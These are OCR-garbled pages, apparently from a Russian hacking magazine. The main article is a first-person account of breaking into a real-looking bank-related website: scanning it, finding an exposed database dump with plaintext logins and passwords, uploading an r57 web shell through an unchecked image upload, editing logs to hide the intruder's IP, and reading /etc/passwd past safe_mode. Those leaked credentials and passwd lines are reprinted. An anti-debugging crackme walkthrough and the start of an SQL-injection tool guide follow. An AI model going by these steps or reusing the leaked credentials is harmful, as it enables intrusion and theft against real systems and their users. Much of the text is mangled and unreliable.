Уже что-то. Обратил внимание на 217.117.74.70: козСіпд . ргіѵак- 
опііпе . пек. Слово «хостинг» в имени домена звучало многообещающе. 
После беглого осмотра козкіпд.ргіѵак-опііпе. пек на нем была 
обнаружена потенциальная угроза 5СИ-инъекции: 



Ь.ккр: //Іюзкіпд.ргіѵак-опііпе. пек/пемз . ркр?іс1= 1 2 



Замаскировать вбеИ под языковой файл рИртуабтіп не такая уж и плохая _ 
идея 



Пришлось позаимствоватьудруга. Через пару минут на мыло пришел 
архивчик, который содержал небольшой сканер, написанный на перле. 
А также баг-лист. 

Задумано — сделано. После непродолжительной работы сканер обнаружил 
интересные каталоги: 



ВЗЛОМ 



И опять попытка неувенчаласьуспехом. Да, этобыл слепой 50І_. Да, вылез 
ѵѵагпіпд. Но поигравши с параметром ісі, я так и не смог добиться чего- 
либо серьезного. Нужен был другой подход (на остальных хостах ничего 
полезного для взлома тоже не оказалось). 

Я уже было отчаялся, нотуту меня возникла вполне здравая мысль проска- 
нировать порты. Что и было сделано. 



Рогк 21 (ккр) . . . Ок ! (рогк 21 — Рііе Тгапзкег 
[Сопкгоі] ) 

Рогк 110 (рорЗ) . . . Ок ! (рогк 110 — Розк Оккісе 
Ргокосоі — Ѵегзіоп 3) 

Рогк 25 (зткр) ... Ок ! (рогк 25 — Зішріе Маіі 
Тгапзкег ) 

Рогк 119 (ппкр) . . . Ок ! (рогк 119 — Ыекчлгогк Ыемз 
Тгапзкег Ргокосоі) 

Рогк 80 (Ьккр - чалам) . . . Ок ! (рогк 80 — Могісі ѴУіс3.е ЭДеЪ 
НТТР) 



ргіѵакЪапкѵір . сот . иа/изег / 
ргіѵакЪапкѵір . сот.иа/пеѵ^з/ 
ргіѵакЪапкѵір . сот. иа/тапиаі/ 
ргіѵакЪапкѵір . сот . иа/ Іодз / 
ргіѵакЪапкѵір. сот. иа/іпко/ 
ргіѵакЪапкѵір. сот. иа/іпс/ 
ргіѵакЪапкѵір . сот.иа/ітд/ 
ргіѵакЪапкѵір . сот.иа/когит/ 
ргіѵакЪапкѵір . сот.иа/рЪртуаЪтіп/Іапд/ 
ргіѵакЪапкѵір. сот. иа/рта/ 

Ничего любопытного, кроме рЬртуабтіп’а. Меня удивило, что не 
нашлась админка (в том, что она должна быть, я не сомневался). Тогда я 
сам попробовал вбить ргіѵакЪапкѵір . сот . иа/асітіп . рЪр — вот и 
она! Но тут меня спрашивали о каком-то пароле, которого я не знал. 

Н ВЗЛОМ С ПРОДОЛЖЕНИЕМ 



* 



В принципе, ничего интересного, кроме кр-сервера. Для пущей радости я 
попробовал посмотреть что внутри и... 

230 ассезз дгапкеЪ Тог апопутоиз . 

0 НАДЕЖДЫ И НОВЫЕ РАЗОЧАРОВАНИЯ 

Сервер без проблем пускал внутрь под анонимом. В корне РТР была папка 
риЬ, а в ней — папки Ретоіе АсІтіпІ5*га*ог2.1 и изегдаіе. Что в них нахо- 
дилось — нетрудно догадаться. Увы, толку все равно было мало. Залить в 
каталоги ничего нельзя. Идеи кончились. Зато сам факт захода на сервер 
вселял в меня надежду, что стоит еще поискать баги. 

Я стукнул в асю к моему приятелю и рассказал про итоги пока что не- 
удачного взлома. Он предложил воспользоваться сканером для поиска 
багов. Под рукой ничего подходящего уменянебыло.а кодить — лениво. 



Все бы, наверное, на этом и закончилось, и смысла в статье было бы ноль, 
если бы через полторы недели я не вспомнил о «незавершенном деле». 
После небольшого трепа по аське все стем же приятелем пришла «кол- 
лективная» мысль поискать на сайте дампы баз. Глупо, конечно, но все 
же... Вручную искать — не по-хакерски, поэтому в ход снова пошел сканер. 
Только пришлось создать новую базу баг-листа. Представлю ее ключевой 
фрагмент. 

/сІЪ. зді 
/сіитр . зді 
/Ьазе . зді 
/Ьапк . зді 
/ргіѵак . зді 
/ргіѵакЪапк . зді 
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/* 140014 ЗЕТ @ОЬВ_ШідіІЕ_СНЕСК8 = @@ШІ01Ш_ 
СНЕСКЗ, ШідіШ_СНЕСК5=0 */; 

/* 140014 ЗЕТ @ОЬБ_ЕОКЕ I СЫ_КЕУ_СНЕСКЗ = @ @ 
ЕОКЕІС]М_КЕУ_СНЕСК8 , ЕОЕЕІСЫ_КЕУ_СНЕСК8= 0 */? 
/* 140101 ЗЕТ @ОЬВ_3<2Ь_МОВЕ=@@80Ь_МОВЕ, 3<2Ь_ 
МОВЕ= "Ш_АВТО_ѴАЬІІЕ^(Ж_2ЕКО , МУЗОЬЗ 23 м * / ; 



— ТаЫе зЕгисЕиге Еог ЕаЫе 'ѵсЕ_а' 



ВКОР ТАВЬЕ ІЕ ЕХІЗТЗ 'ѵсЕ_а' ; 

СКЕ АТЕ ТАВЬЕ 'ѵсЕ_а' ( 

' ісЗ. ' іпЕ(10) ипзідпесі 
НОТ НВЬЬ аиЕо_іпсгешепЕ , 

'Еоісіег' іпЕ(10) ипзідпесі 
НОТ ШЬЬ сіеЕаиІЕ 1 0 1 , 

'паше' ѵагсЪаг ( 10 0 ) ИОТ НВЬЬ сіеЕаиІЕ 
'ЬаЕе' іпЕ(10) ипзідпесі 
НОТ НВЬЬ сіеЕаиІЕ ' 0 ' , 

РКІМАКУ КЕУ ( ' ІЬ' ) , 

КЕУ 'Еоісіег' ('Еоісіег') 

) ТУРЕ=МуІ8АМ; 



Удача! Вотон, дамп! Чуть ниже было: 




> ІП^О 



Довольно часто имя 
ресурса (указанное 
полностью или 
частично) является 
«ключом» к самому 
ресурсу. Например, 
— имя дампа и 
логин:пасс к БД. 



/ргіѵаЕЬапкѵір . зді 
/ргіѵаЕЬапкѵір . сот . зді 
/ргіѵаЕЬапкѵір . сот . иа . зді 

Итак! Запуск и ожидание! Когда сканер выплюнул результат, 
я чуть не подавился котлетой (а какты хотел, каждый уважаю- 
щий себя хакер ест прямо за компом). 

ЬЕЕр : / /ргіѵаЕЬапкѵір . сот . иа/ргіѵаЕЬапкѵір . зді 

Быстро вбив найденный ІІРІ_ в адресную строку оперы, я стал 
ждать заветной фразы «Документ не найден». Но браузер 
выдал мне страницу та ко го содержания: 

- МуЗОЬ Ьитр 10.9 

— НозЕ: ІосаІЬозЕ ВаЕаЬазе: ргіѵаЕЬапкѵір 



— Зегѵег ѵегзіоп 4.1.9-1од 



/*! 40000 АЬТЕК ТАВЬЕ 'ѵсЕ_ассезз' ВІЗАВЬЕ 
КЕУЗ */; 

ЬОСК ТАВЬЕЗ ' ѵсЕ_ассезз ' ШІТЕ; 

ІНЗЕКТ ІНТО ' ѵсЕ_ассезз ' ѴАЫІЕЗ 
( ' зегдеу_г ' , '90993829ах' , 1146745144 , ' 10 . 
1.111.105' , '1111111111111111' ) , ( ' зегд199 
4' , ' 9713 ОесЬ ' , 1123567700, '10.1.111.134' , 

' 111111111111110 ' ) , ( ' ЕозЬа ' , ' заЬигЬапЗЗ ' 
,1145012488, ' 195 .248 . 163 .246 ',' 11111111 
ШИШ 1 ) , ( ' Ьіта_р ' , 'еа94а14Ь' ,114 67 49 
816, '10.1.111.105', '111111111111110' ) , ( 

' паЕаІі ' , 'Е6а8Е1ЬЬ' ,1146745660, ' 10.1.111 
.95' , '000000000001000') ; 

ВНЬОСК ТАВЬЕЗ; 

/*! 40000 АЬТЕК ТАВЬЕ 'ѵсЕ_ассезз' ЕНАВЬЕ КЕУЗ 
*/; 

Н А ВНУТРИ... 

Я не верил своим глазам: банковские аккаунты в открытом 
виде! Я в момент написал коллеге о находке. Пара логин: 
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пасс «зегдеу_г : 90993829ах» давала право на вход в 
админку, представляющую собой скудную возможность 
редактирования страниц сайта через взаимодействие с 
базой. В информационном разделе предлагалось добавить 
статью и установить картинку. Кликнув на кнопку «ОБ- 
ЗОР», я быстро нашел в дебрях своего винта знаменитый 
шелл от Р5Т г57зЬеи и нажал «Сохранить». Все прошло 
без запинки. Расширение «картинки» не проверялось. По 
приглашению «Добавить еще статью» я понял, что шелл за- 
лился, осталосьтолько найти куда. Я обратил внимание, что 
списокувеличился и кликнул по новому элементу. Тутсразу 
бросилась в глаза надпись «рисунок» (вместо картинки, как 
полагалось). 

Скопировав адрес «рисунка» ивбивегов строку браузера, я 
мог лицезреть полноценный шелл! 

кккр : / /ргіѵакЪапкѵір . сош. иа/ішд/изег/ѵсд_ 
изегЗ 53 . рНр 

Как выяснилось позже, сервер крутился на ЕгееВЗБ 6.2 да 
и еще заке_тос1=(Ж, так что на права рута можно было не 
надеяться (впрочем, мне они были и не нужны). 

Я порыскал по файлам и все-таки нашел параметры тузд1_ 
соппеск ( ) . 

$зд1Ьазе= 1 ргіѵакЪапкѵір 1 ; 

$зд1кюзк= ' ІосаІЪозк ' ; 

$зд11одіп= 1 ргіѵакЪапкѵір 1 ; 

$зд!разз= 1 ргіѵакѵір 1 ; 



Ад минка во всей красе... 




л- 



Потом залил на сервер зді. рЪр. Мне просто хотелось 
взглянуть на их базы. 

Первым делом зашел в таблицу ѵск_ассезз , так как, 
судя по имени столбца Іазкір, можно было предполо- 
жить, что здесь хранится последний ІР, с которого захо- 
дили пользователи. Так и есть. Не будем же оставлять в 
логах мой «прокси к». Поэтому — бережно пофиксил ІРиз 
дампа. 

Больше ничего стоящего на глаза не попалось. Порыскав 
по файлам и директориям и слив все, что вызвало интерес, 
я с сожалением для себя обнаружил, что выше /ѵаг /шш / 
ргіѵакЪапкѵір подняться невозможно. Жал ь. Наверня- 
ка, там тоже было, чем поживиться. 

Тогда я вспомнил про обход ограничений заТе_тос1е с 
помощью ітар_1ізк. Вставив в качестве пути «/ѵаг/ 
тт/», я нажал «проверить». Через 1 5 секунд моему взору 
открылся слепок файлов и каталогов /ѵаг /шш/ с их 
подкаталогами. Если работал ітар_1ізк, то была высока 
вероятность, что получится прочитать любой файл с по- 
мощью ітар_Ьо<іу. Я подставил /екс/раззѵлі , нажал 
«проверить» — и вскоре передо мной был /екс/раззѵлі. 
Теперьу меня была возможность читать почти любой файл 
на сервере, зная его полный путь (что не так уж и мало, 
при условии, что у меня были полные пути всех файлов из 
/ѵаг /щшг/}. 

А вот и кусокзаветного /екс/раззшЗ: 

# $РгееВЗБ: згс/екс/тазкег . раззжЗ, ѵ 1.39 
2004/08/01 21:33:47 тагкт Ехр $ 

# 

гоок : * : 0 : 0 : СЪагІіе & : /гоок : /Ып/сзЪ. 
коог : * : 0 : 0 : Воигпе-адаіп Зирегизег : /гоок : 
сіітка :*:1002:20:Юзег & : /кюте/сіітка : /Ып/зЬ. 
аЪк: * : 1000 : 1000 : : /изг / Іосаі /члплпл/аЪк : /Ып/зк 
ѵ^еЬтіп :*:1003:1001 : Асітіпізкгаког ІлГЕВМІЫ : / 
ѵ\плплМ-меЪтіп : /Ьіп/зк 

о1ед421 :*:1004:1002: : /ѵллплМо1ед42 1 : /Ьіп/зк 
рсопзиік : * : 1005 : 1003 : Приват Консалтинг : /ѵтѵі/ 
рсопзиік : /Ьіп/зк 

г р.5. 

Взлом был совершен в прошлом году. Но, как ни странно, 
и почти год спустя удалось повторить тот же «подвиг». Ни- 
чего не из мен ил ос ь!0чем думают админы, можно только 
догадываться. Это учитывая, что я их предупредил... □□ 




> ѵісіео 

Как всегда, на нашем 
дискеты найдешь 
живое видео по взло- 
му. Если по тексту что 
не ясно, то просим к 
просмотру. 




> ѵѵагпіпд 

Вся информация 
выложена с целью ука- 
зать на элементарные 
ошибки и не может 
расцениваться как 
призыв к действию. 

Ни автор статьи, ни 
редакторы журнала не 
несут ответственность 
за то, что ты можешь 
сотворить. 
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взлом 



КРИС КАСПЕРСКИ 



ЭНЦИКЛОПЕДИЯМ 

АНТИОТЛАДОЧНЫХ 

ПРИЕМОВЖШЙМ 



САМОТРАССИРОВКА И ПРОЧИЕ ГОЛОВОЛОМКИ 



ІСегодня мы 



г дем ломать мои сгаск-те, напичканный антиотладочными 



иемами. Они основаны на особенностях обработки исключений отладчи 



ами и на ошибках в беЪіі% еп%іпе, о которых я расскажу по ходу дела 



А заодно продемонстрирую интимные подробности основных хакерских 
инструментов — ольги, иды, $у$ег’а, х86ети и прочих. 



азгадывать загадки намного интереснее, чем читать готовые 
решения. А потому, пока еще не поздно, оторвись от статьи и 
попробуй расковырять ЗобоП сгаск-те (который можно взять 
с диска, прилагаемого кжурналу, или скачать из моего репро- 
зитория на ОрепКСЕ: орепгсе.огд/герозііогіез/изегз/пегиті/сгасктедііг . 
2 Ір). В подсказку не заглядывать! Исходный текст не смотреть! Впрочем, сам 
по себе исходный текст (даже с учетом всех содержащихся в нем коммента- 
риев) совершенно не объясняет, какже его отлаживать. 

Здесь отсутствуют шифровка, самомодификация и прочие приемы, 
ослепляющие статический анализ. Дизассемблер выдает аккуратный 
листинг, каждая машинная команда которого абсолютно понятна. Одна- 
ко результат действия программы в целом оченьтрудно предсказуем и 
требует довольно глубоких знаний устройства процессора и операцион- 
ной системы. Поистинетанталовы муки! Какой-то несчастный десяток 
машинных инструкций (ядро сгаск-те) отделяет нас от победы! Что ж, 
тем большее наслаждение испытываешь от взлома! Ну, а если самому 
взломать никак не получается — на этот случай я привожу развернутое 
объяснение. 



Н ЧТО МЫ БУДЕМ ЛОМАТЬ 

Исходныйтекст ЗоЬоН сгаск-те приведен в листинге 1 . Это чудо моей 
инженерной мысли после компиляции занимает всего 832 байта, большая 
часть которых приходится на РЕ-заголовок. Конечно, его можно было бы 
ужать, программируя в Ьех-кодах, но это ж сколько труда надо потратить! А 
так — файлы легко компилируются штатными утилитами от МісгозоЙ. 

Кстати, о компиляции. По многочисленным просьбам трудящихся, я 
отказался от командных файлов и перешел на макак (в смысле, на .так), 
обрабатываемыхутилитойШАКЕ из комплекта поставки М5 ѴізиаІЗіисІіо. 
БМАКЕ /Т сгаскше_з]тг .так собирает релиз, а БМАКЕ /Т " сгаскте_ 
зкг.так" СЕС= " сгаскте_з']тг - Ѵ/іп32 БеЪид " — отладочную версию. 
Только все равно отладить ее с помощью М5 Ѵізиаі Зіисііо неудастся — нет 
смысла даже пытаться. 

Также поддерживается сборка и из ЮЕ — достаточно открыть макаку и сде- 
лать Ъиіісі. Тупая студия всегда ищет скомпилированный файл в каталогах 
\ БеЪид и \Ке1еазе, тогда как мыщъх создает его в текущей директории, 
поэтому за пуск файла непосредственно из ЮЕ невозможен (хотя, возмож- 
но, что в последних версиях МЗуже пофиксила этот косяк). 
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ІЗуве г напрочьотказывается грузить ІоЬоР сгаск-те в геіеазе^ 
ІЬиіІсГеІ 



ІПопытка отладки билда ІоЬоР сгаск-те под Зувег’ом. Отладчикв панике, система — в| 
|ауте, хакер — на измене|~ 



ИСХОДНЫМ ТЕКСТ .ІОНОР СРАСК-МЕ 

#іпс1ис!е сЫпЬомз . Ь> 

іпб соипб; 

сЬаг збг [] =" 0123456789АВСБЕЕ! " ; 

сіесізрес (пакеЬ) пегиті ( ) 

{ 

азт{ 

; / / іпб 03 ; // бог ЗоббІСЕ 

хог еах, еах ; // еах := О 

шоѵ еЬх, бз: [еах] ; // оісі ЗЕН 

ризкбсі ; // заѵе ЕЕЬАСЗ 

; /У- [пеѵ^ зек] - ; 

ризЪ. оббзеб 11 ; / / ЬапсЗІег ргос 

ризЬ -1 ; // бке Іазб Ьапсііег іп бЬе сЬаіп 

шоѵ бз: [еах] , езр ; // аззідп бЬе пеѵ^ Ьапсііег 
і//-[Ь.аскег біте]-; 

хог еах, [еах] ; // <-- АССЕЗЗ ѴІОЬАТІОЫ 
; / / - [зеб ТЕ Ыб] - ; 
ризЬ -1 ; // ТЕ : = 1 

хог еах, [еах] ; // <-- АССЕЗЗ ѴІОЬАТІОМ 
рорбсЗ ; // ЕЕЬАСЗ := 00244ЕБ7І1 



хі : іпс дмогсі рбг [есЬс+ОВБЬ] ; // зкір опе Ьубе 
зеб_бб_Ыб: ; // <--Х 

стр сблгогсі рбг [есіх + 0В8Ь] , оббзеб епс!_об_1іпе 
^ае епс1_об_]тап(і1ег 

; // сіопб зеб ТЕ-Ыб _оибзіс!е_ бгасе-гопе 
ог сі^огсі рбг [есІх+ОСОЪ.] ДООЬ. 

; // < зеб ТЕ-Ыб _іпзіс!е_ бгасе-гопе 

епЫоб_Ьапс11ег : хог еах, еах 

; // ЕХСЕРТІОН_СОНТІШЕ_ЗЕАКСН 

іпс [соипб ] ; // ЕХСЕРТІОЬ СОЬЫТ 

геб ; // епсЗ об бке Ьапсііег 

; //- [ехіб] - ; 

епсі_об_1іпе :шоѵ бз: [еах] , еЬх 

; // гезбоге бке оІсЗ ЗЕН 
зиЬ езр, 8 ; // гезбоге бііе збаск 

рорбсі ; // гезбоге бке біадз 

} 

// ргіпб ЕХСЕРТІОЫ СОШТ 

соипб = збг[(соипб>0х10)?0х10:соипб]; 

МеззадеВох ( 0 , &соипб , " НокоК" ,МВ_ОК) ; 

ЕхібРгосезз ( 0 ) ; 



; //- [ ТРАСЕ- 20ЫЕ] 

шоѵ еах, [еах] ; // <-- АССЕЗЗ ѴІОЬАТІОЫ 

пор ; // < — ЭДТ 01 

и (12 ; // <-- ІЬЬЕСАЬ ІЕЗТРЬСТІОН 

пор ; // <-- ШТ 01 

пор ; // <-- ШТ 01 

іпб 03 ; // <-- ШТ 01 

зшр епсі_об_1іпе ; // : — бо ехіб --> 

; // - [зек капсііег] - 

11: шоѵ еах, [езр + 04Ь] ; // *ЕХСЕРТКЖ_РЕСОРБ 

12: шоѵ есіх, [езр + ОСЬ.] ; // ЕБХ -> СопбехбРесогсІ 

шоѵ еах, [еах] ; // ЕХСЕРТІОЬ СОБЕ 

стр еах, ОСОООООІБЬ ; // ІЬЬЕСАЬ ІЬЗТРЬСТІОР 

]2 х2 ; // X — > 

сшр еах, 08000000 ЗЬ ; // ШТ 03 

]2 хі ; // — зкір 1 Ьубе --> 

сшр еах, ОСООООООБЬ ; // АССЕЗЗ ѴІОЬАТІОЬ 

ЗП 2 зеб_бб_Ьік ; // — Ьоп'б зкір --> 

х2 : іпс склгогЬ рбг [еЬх+0В8Ь] ; // зкір опе Ьубе 



В АЛГОРИТМ 

Первыетри команды сохраняютуказатель на текущую (системную) 5ЕН- 
запись в регистре евх и заталкивают в стек флаги процессора, попутно 
обнуляя ЕАХ. Следующиетри команды устанавливают новый 5ЕН-обработ- 
чик, находящийся по смещению 11, замыкая 5 ЕН -цепочку терм и рующим 
указателем -1 (реееерееЬ). Он сигнализируетсистеме отом, что данный 
обработчик — последний. Воттакой маленький трюк (почему-то большинст- 
во хакеров добавляют свой обработчик к цепочке уже существующих 

— хотя передавать им управление все равно не собираются, зачем же тогда 
усложнять код?). 

Сразу же после установки 5ЕН -обработчика выполняется команда ХОК 
ЕАХ, [ЕАХ] , «выбрасывающая» исключение доступа типа АССЕЗЗ 
ѴІОЬАТЮЬ. Операционная система ловит его и передает управление 
на метку 11, с кодом СООООООБЬ, расположенным в двойном слове по 
адресу [ЕЗР + 04Ь] . Обработчик видит, что это АССЕЗЗ ѴІОЬАТЮЫ и, 
зная, что его вырабатывает инструкция ХОК ЕАХ , [ЕАХ] , лезет в регис- 
тровый контекст. При этом он увеличивает значение еір на два байта 

— зігеоб (ХОК ЕАХ, [ЕАХ] ) , поскольку АССЕЗЗ ѴІОЬАТІОЬ пред- 
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ставляет собой •раиН. Если пояснять, то в момент генерации исключения 
регистр еір указывает на начало возбудившей его машинной команды. 
При выходе из обработчика процессор будет выполять ХОК ЕАХ , [ ЕАХ] 
снова и снова, пока мы либо не изменим ЕАХ так, чтобы он указывал на 
валидную область памяти, либо не увеличим значение ЕІР, переходя к 
выполнению следующей машинной команды. Что мы и делаем, попутно 
увеличивая счетчик вызова исключений (соипі) на единицу. 

Зачем нам это? При пошаговой трассировке программы, когда взве- 
ден ТР-бит, операционная система следом за АССЕ83 ѴЮЬАТісж 
генерирует ЗІЫСЬЕ ЗТЕР. В результате, вместо одного исключения мы 
получаем целых два, и 5ЕН-обработчик под отладчиком вызывается 
дважды, позволяя программе обнаружить, что ее ломает злобный хакер! 
Отладчики М5 ѴС, М5 ѴѴІпОЬд, ЗоШСЕ (и ряд других) давят ЗІЫСЬЕ 
ЗТЕР-исключение, сбрасывая флагтрассировки через контекст, а вот 
Ольга 1 . 1 х об этом не заботится. Ошибка была исправлена только в вер- 
сии 2.x (все еще находящейся в разработке). Подробнее об этом мыщъх 
рассказывает в своем блоге: 5оцгІ2.ѵѵогбрге55.сот/2008/05/09/Ьид-іп- 
оЦу-ѵѵіпсІоѵѵв-ЬеЬаѵіог-апсІ-реІег-Юггіе («Ьид іп 0 Ну, ѴѴІпбоѵѵв ЬеЬаѵіог 
апб Реіег Ееггіе»). 

Три следующих машинных команды взводят флагтрассировки. На самом 
деле, флагтрассировки взводится с помощью всего двух команд — РІІЗН 
-1/РОРЕБ, а ХОК ЕАХ, [ЕАХ] , расположенная между ними, вставлена 
для борьбы с одним экспериментальным отладчиком, что «отлавливает» 
инструкцию РОРЕБ. Если ломаемая программа взводит бит трассировки, 
отладчик врубает модул ь эмуляции, но если управление на РОРЕБ пере- 
дается посредством правки регистрового контекста, — отладчикэтого не 
просекает. Точнее, раньше не просекал, а сейчас ошибка исправлена. 
РОРЕБ выталкивает -1 (РРРЕРРРРЬ) из стека, устанавливая процес- 
сорные флаги в единицу. Конечно, далеко не все флаги, а только те, ко- 
торые позволено модифицировать прикладной программе. О чем, кстати 
говоря, «догадывается» далеко не каждый эмулирующий отладчик, а 
потому — значение ЕЕБАСЗ под «живым» процессором и, например, 
х86еггш сильно отличаются. Но х86егли, в общем-то, и не подряжался 
эмулировать все флаги процессора. В принципе, здесь можно вставить 



проверку — если ЕЕЬАСЗ не равняется 00244ЕБ7ІТ, то одно из двух 
— либо наело мают на эмуляторе, либо это какой-то очень левый процес- 
сор. Впрочем, поскольку достойных эмулирующих отладчиков под х86 
все равно нет, подобная проверка лишена смысла. 

Но не будем отвлекаться. Флагтрассировки успешно взведен и по 
завершению команды, следующей за рореб, процессор генерирует по- 
шаговое исключение. А этой командой является наша старая знакомая 
хок ЕАХ, [ЕАХ] , «выбрасывающая» АССЕЗЗ ѵюбатіоег, что пред- 
шествует пошаговому исключению. В данном случае система генерирует 
два вполне законных исключения. Вот только большинство отладчиков 
ошибочно принимают исключение, сгенерированное программой, 
за свое собственное и давят его. В результате чего 5 ЕН -обработчик 
вызывается на один раз меньше. Ольга 1 ,1х эту ситуацию обрабатыва- 
ет вполне правильно (точнее, никак не обрабатывает, тупо передавая 
все исключения программе), а вот исправленная Ольга 2.x путается в 
исключениях и «давит» лишнее (с ееточки зрения) пошаговое исклю- 
чение. Другими словами, под Ольгой 1 .1 х 5ЕН -обработчик вызывается 
на один раз больше, чем под «живым» процессором (сучетом первой 
команды МОѴ ЕАХ, [ЕАХ] ), а под Ольгой 2.x — на один разменыше. 
Красота! И какую же версию нам выбирать? Что касается 5оШСЕ (и 
некоторых других отладчиков), он «кушает» все пошаговые исключения, 
генерируемые отлаживаемой программой, обламывая самотрассировку. 
Потому 5ЕН-обработчик вызывается только на МОѴ ЕАХ, [ЕАХ] —как 
следствие: счетчик вызовов соипі оказывается намного меньше, чем 
ожидаетзащита, сразуже понимающая с кем она имеет дело. 

Команда БОР «честно» генерирует пошаговое исключение (ведь бит 
трассировки взведен!), но ЗоііІСЕ его поглощает. Остальные отладчики 
(типа Ольги и ЮА Рго) хотя бы можно настроить на отдачу пошаговых 
исключений ломаемой программе. Причем, ЮА Рго 5.2 предложит сде- 
лать это автоматически, в то время как Ольга требует ручной настройки 
(вкладка «Ехсерііопв» в опциях отладчика). 

Инструкция ББ2 генерирует исключение типа ІББЕСАЬ ШЗТКБСТІОЫ, 
перехватываемое ЗоііІСЕ и не отдаваемое отлаживаемой программой 
вплоть до отдачи команды «іаиііз о II». Зувег такой команды вообще 
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Н СЧАСТЛИВЫЙ ФИНАЛ 

Так как же все-таки ломают эти программы? И какими отладчиками? В 
случае статического кода (к которому относится мой сгаск-те) пробле- 
ма решается установкой точки останова за пределами «горячей» зоны, 
где происходит выброс исключений, с прогоном их на живом процес- 
соре (без пошаговой трассировки). Если же нам жизненно необходимо 
подсмотреть значение некоторых регистров или ячеек памяти внутри 
«горячей» зоны — на них устанавливается аппаратная точка останова. 
Динамический код (упакованный, зашифрованный, само модиф и - 
цирующийся) заломать намного сложнее, поскольку нам реально 
необходимо прогнать его через пошаговый трассировщик, с которым 
и борется защита. Заметим, весьма эффективно борется. В0СН5 (бес- 
платная виртуальная машина со встроенным отладчиком) — единс- 
твенный разумный выбор, но, сколько грузится на нем ѴѴІпбоѵѵз, лучше 
не говорить. ПС 
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не знает, обзывая ее как«БВ» («объявить байт») и неверно дизассем- 
блируя весь последующий код (что не покажется удивительным, если 
вспомнить, что Ш2 — двухбайтовая команда). 

Пара последующих ЫОР’ов не делает ничего, кроме генерации поша- 
гового исключения, особенность обработки которого мы обсуждали 
двумя абзацами выше. Такзачем же тогда они нужны? Подсказка— раз- 
ные отладчики имеют разные баги, «съедая» различное количество 
исключений. Правильно! Данный сгаск-те определяет тип отладчика 
по значению соипі;, уникальность которого обеспечивается соотноше- 
нием команд, генерирующих свои собственные исключения, к общему 
количествутрассируемых инструкций. Если убрать ЫОР’ы, сгаскте 
продолжит детектить активную отладку, но уже не сможет определить, 
какой именно отладчик используется хакером. 

Команда шт О ЗЪ. также вставлена неспроста, а с умыслом. Если даже 
настроить отладчик на отдачу шт ОЗЪ ломаемой программе, наличие 
ШТ ОЗЪ существенно затрудняет отладку. Если бы шт ОЗЪ не было, то, 
чтобы быстро выбраться из глубин системного обработчика исключений 
назад к ломаемой программе, достаточно было бы покрытьтрассируе- 
мый блок программными точками останова (в Ольге для этого нужно на 
каждой команде нажать <Е2>). Программные точки останова представ- 
ляют собой однобайтовую инструкцию ССЬ, легко обнаруживаемую 
подсчетом контрольной суммы и «разваливающую» самомодифици- 
рую щи й код. Впрочем, ни того, ни другого в сгаскте нет, а есть только 
ШТ ОЗЪ. Чисто теоретически, отладчик может (и должен) отличать свои 
собственные шт 03 1т от чужих, отдавая программе только те исключе- 
ния, которые она сама же и сгенерировала. Но на практике отладчики 
путаются. Ольга, настроенная на отдачу шт ОЗЪ. ломаемой программе, 
при установке программной точки останова поверх шт ОЗЪ. циклится, 
вынуждая хакера применять аппаратные точки останова (которых всего 
четыре) или точки останова на регион памяти, реализованные через 
подмену атрибутов страниц, что также легко обнаруживается. 

Кстати, сточки зрения процессора, шт ОЗЪ генерирует Егар, а не 
ТаиІБ. То есть, регистр еір в момент гене рации исключения смотрит на 
команду, следующую за шт ОЗЪ, которой в нашем случае является двух- 
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байтовая инструкция БМР ЕШ)_ОЕ_ЬШЕ. В чем же подвох? 
А втом, что 5ЕН-обработчик отлавливает ВКЕАКРОШТ-ис- 
ключение (соответствующее коду 0800000031т) иувели- 
чивает значение еір на единицу. Неужели управление 
передается в середину инструкции цмр еыб_ОР_ыые? 
Какой хитрый прием против дизассемблера! Гм, вот 
только непонятно... первый байт опкода БМР 8НОКТ равен 
ЕВЪ., второй — представляет относительное смещение 
целевого перехода. И чтобы оно соответствовало осмыс- 
ленной машинной инструкции, необходимо, чтобы метка 
ЕЕБ_ОЕ_]1іШЕ располагалась на определенном смещении 
от команды ЦМР. А в сгаск-те между ними расположен 5ЕН- 
обработчик. Выходит, если его изменить, то сгаск-те сразу 
перестанет работать? Такая хитрая защита исходныхтекстов 
от изменения! 

И чего только со страху не покажется. Да, в руководствах от Іпіеі 
черным по белому написано, что вкеакрошт это Ігар, а не {а и II. Вот 
только 5ЕН -обработчик вызывается не процессором, а операционной 
системой. Той, что написана компанией М іеговой. А М іеговой ѴѴау умом 
не понять. Ну чем можно объяснить, что она подменяет процессорный 
контекст, умышленно уменьшая ЕІР на единицу? Парни из М іеговой 
впопыхах забыли, что вкеакрошт может генерироваться как опкодом 
ОСЬ, так и ОБЪ. ОЗЪ, а потому, если внедрить СОИ 03 Ь в программу и 
никак ее не обрабатывать, то после выхода из исключения, регистр ЕІР 
будет смотреть на опкод ОЗЪ, соответствующий команде АББ чего-то там. 
Допустим, за СБЬ ОЗЬ следует ОСЬ (еще один шт 0 ЗЬ., только слегка 
другой). Тогда процессор выполнит опкод ОЗЬ ССА — АББ ЕСХ, Е8Р . 

Вот и попробуй догадаться об этом при дизассемблировании! 

Наконец, команда БМР ЕББ_ОЕ_БШЕ выводит код из зоны трассировки. 
Программа восстанавливает прежний 5ЕН, выталкивает из стека флаги 
и распечатывает значение счетчика исключений, после чего завершает 
свое выполнение вызовом функции ЕхіБРгосезз ( 0 ) . 
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ПРОГРАММА: 5ІРТ 4 
0С:Ѵ№0Ѵ52000/ХР 
АВТОР: 50ШАСК 




Расширенный инструмент для работы со 501- 
инъекциями 



В предыдущих номерах я выкладывал функ- 
циональныеутилы для работы со вці-инъекция- 
ми. Сегодня я хочу предложить еще одну полез- 
ную софтину подобного рода — 51 РТ4. Тулза обладает 
потрясающими фишками. Какс ней работать? 

1. Перед началом работы необходимоуказатьдва 
важных параметра: атакуемый ресурс (включая 
путь до уязвимого скрипта) и метод передачи 
данных (6ЕТ или Р05Т). 

2. Натойже вкладке во фрейме 5ЕРѴЕР 
ТІМЕОІІТ требуется установить таймаут ответа 
сервера (в секундах). 

3. Выбрать, в каком месте запроса присутствует 
инъекция (ШЕСТІОЫ ТУРЕ) - ІІРЕ, Р05Т0АТА 
или НЕАОЕР. Здесь следует пояснить: 

a) (ВЕСШЕ5ТТѴРЕ) - 6ЕТ+(ІШЕСТІ0М ТУРЕ) 
-ІІВІ_. 

Метод используется, когда инъекция присутству- 
ет в 6 ЕТ- пара метре. Пример: ЬНрУАллллл/ТагдеЕ 
ги/всгірЕрЬрІісРІ . Если уязвим параметр ісі , 
запрос на сервер принимает вид: 

Ьир://ѵѵѵѵѵѵ.1агаеЕги/5сгірТрЬр?іб=1{50иМЛ 

